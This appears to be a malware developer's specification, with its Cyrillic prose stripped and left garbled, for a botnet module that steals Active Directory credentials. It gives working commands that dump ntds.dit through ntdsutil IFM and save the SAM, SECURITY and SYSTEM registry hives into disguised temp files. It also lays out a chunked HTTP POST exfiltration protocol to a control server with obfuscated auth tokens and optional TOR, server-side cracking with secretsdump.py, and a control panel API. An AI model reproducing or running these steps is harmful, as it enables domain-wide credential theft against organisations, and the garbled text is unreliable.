   ACTIVE DIRECTORY     WINDOWS
 




    Active Directory    ,    .


 

    `ntdsutil'   .
    ,          impacket / secretsdump.py
    Active Directory     :
https://devteev.blogspot.com/2014/04/hacking-tricks-easy-way-to-get-ntdsdit.html

      HKLM/SAM, HKLM/Security  HKLM/System.




           modules_HOWTO.
 / - ADll.
  ,      SYSTEM.

*     ,      Active Directory.

*  ,   "AD not found"   .

* ,  ,    Volume Shadow Copy  WinAPI
(   sc query vss),   ,  ()  .

*     .
   4:
ntds.dit
sam.dump
security.dump
system.dump

         :
<prefix>0.dat
<prefix>1.dat
<prefix>2.dat
<prefix>3.dat

      ParentInfo.ParentID (. module_HOWTO)     :
-            
-      
-         
-     -  (      )
-  .

   :
-  64-     (  unsigned)  ParentInfo.ParentID
- 64-     unsigned char filename[8]
-  ,   'a',  'a'
-  ,   'Z',  'Z'
 ,          ,          ,   .

    .

*            %TEMP%
 () ,       .
        -  , ,      ,
    .

*     

ntdsutil "ac in ntds" "ifm" "cr fu %temp%\<prefix>0.dat" q q

  ,        WinAPI
(  ;      ).

*     HKLM/SAM, HKLM/Security  HKLM/System 

reg save hklm\sam %temp%\somepath\<prefix>1.dat
reg save hklm\security %temp%\somepath\<prefix>2.dat
reg save hklm\system %temp%\somepath\<prefix>3.dat

*          (..).
            (,         ).
     () chunksize.     - 10.

       (.).
       ,      TIMEOUT_MIN...TIMEOUT_MAX
(  ).     .
   (  ;  ,   HTTP 200 OK;    ),
     (   ),    ,
   .
  ,      WantRelease     

while(1) Sleep(1000);

 ,      .




      srvad.
     ,   \r\n.
  -   URL,     .
     http  https,    URL .
  ,   http,   -  https.

       TOR.
    TOR  .


  

     :
-     -
-     .

1)         HTTP POST   multipart/form-data (   html-).
POST   :
timestamp -  UNIX-
ip        -  ParentInfo.SelfIP (. module_HOWTO)
ip1       -    
ip2       -    
...
ipN       -  N-  
cid       -  ParentInfo.ParentID (. module_HOWTO)
group     -  ParentInfo.ParentGroup (. module_HOWTO)
hostname  -  ,   GetComputerName()
source    -  `ntds'

   url :
http://foo.com/<junk>/<auth>/<junk>
junk -  ,   URI,   /
auth -  . ,     ,
     .
 -   . 
  :
-  Z    
-   ( !)  6  15-    31. 
   - .       Z.
  - abcde7ol7k9hi8mZ


2)      ,  HTTP POST,   multipart/form-data.
    file.
     Content-Disposition;     URI .
 :
-     .  ,    100,    10 .
-       ,   -    ,   .
   ,      ,     .
    SetEndOfFile().
-  ,          gzip.
-    URL 
http://foo.com/<junk>/<auth>/<cid>/<filename>/<start>/<end>/<eof>

junk -  ,   URI,   /
auth -  .  -   ,   
-  S   
-   ( !)  8  15-    25. 
filename -   ;
start -       ;    ,  .
    ,     .
, 0A --   0 ( 0 ,  A ).
end -       ;   ,    start.
, 3A5A2A3A9A5A9A -  3523959.
eof -   .   ,    ;   ( )
   ,   :
-     0
-   A  F 

    ( )   :
0 - ntds.dit
1 - sam.dump
2 - security.dump
3 - system.dump

  ,  HTTP- 200     ,
  -200     (, 50*  40*  ).
     XML   HTTP-,   <response>.
     4041,   1 -      (    ).

,        9:

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept

<?xml version="1.0" encoding="UTF-8"?>
<response>4049</response>

  -  ,  
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept

<?xml version="1.0" encoding="UTF-8"?>
<response>200</response>



      .
    -  .

         :

 | ClientID| Group | IP | Hostname | Total Size

 .

 -      ClientID (.   ).

   :
-  (   )
- ClientID
- Group
- IP
- Hostname
- Total Size (   )

  - .
         - (var $issledovanie - ; var $research - ).

       .

    ;    (   " ?"         ).
         .
     .

      ,   ;    .

      " ".
  ,  ""   (    ).

  Active Directory     :

sudo ./secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local

 ntds.dit  SYSTEM -        
result -   

   :

secretsdump.py -sam sam.dump -security security.dump -system system.dump LOCAL

 ,  :
-  -       ntds.dit, sam.dump, security.dump, system.dump
(     )
-  ,      
-  stdout, stderr        
-   "  ",    ,   .txt  .zip.
      ,     .

 ***

     :

pip
pip install impacket
pip install impacket --upgrade (if needed)

pip install pycrypto (--upgrade if needed)

pip install pyasn1 (if needed)

apt-get install python-dev (if needed)



API 

   API     :

POST /api/v1/hello HTTP/1.1

          .      
(.   ).

POST /api/v1/savef/<cid>/<filename>/<start>/<end>/e

      (.   ).

  200 - .
   200 - .       API.

      ,       (   ).
       .    ,     :

ntds.dit
sam.dump
security.dump
system.dump

    /    -  .

!
      4 (!) .
        (  ).
,    ,         cid.
,        .


 "" 

   "" ,      .
     (/log/1234)         , 
injectDll
pwgrab
importDll


        ,       ( ).
                (..     ).
      .
..         ,     ,     .


